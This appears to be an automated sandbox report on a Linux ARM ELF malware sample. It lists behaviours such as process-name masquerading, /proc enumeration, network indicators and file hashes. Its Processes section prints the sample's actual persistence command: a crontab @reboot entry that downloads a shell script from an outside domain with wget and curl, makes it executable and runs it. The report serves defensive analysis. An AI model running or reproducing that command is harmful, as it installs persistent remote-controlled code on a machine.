Malware Analysis Report

2024-11-13 15:53

Sample ID 241027-c9n9lasfke
Target ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
SHA256 ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645

Threat Level: Shows suspicious behavior

The file ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Enumerates running processes

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:46

Reported

2024-10-27 02:49

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

140s

Command Line

[/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 81.169.136.222 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.wNhaz5 /usr/bin/crontab N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself mini_httpd /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/705/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/677/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/694/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/682/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/684/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/688/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/691/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/700/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/707/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/675/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/680/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/690/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/698/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/703/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/706/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/709/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/674/cmdline /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/687/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/670/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/2/cmdline /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/669/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/696/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/704/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/708/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/674/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/683/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/701/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/673/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/1/cmdline /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/678/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/681/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/695/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/702/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/710/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/665/cmdline /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/672/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/676/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/679/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/689/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/692/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/693/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/697/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/mounts /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/671/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A
File opened for reading /proc/699/status /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf N/A

Processes

/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf

[/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
DE 81.169.136.222:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:3869 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.wNhaz5

MD5 a7092eb6aa79161f5a3758d751aae1b3
SHA1 0f3e2f380e53ee3e3c412b75715939031fa40b04
SHA256 f6cd9800f1a8a1025b04977d62bcaf5f0d4642f8822ea73db53b5d986d576ac4
SHA512 02ea889ecb85f5ee111b8c7cc9937423214e809d1edbe85cedb8984e9dbc0a2c49561ca9159d468216bb27617211d74b80f2aefab34b2199b7e007eb7b487ba0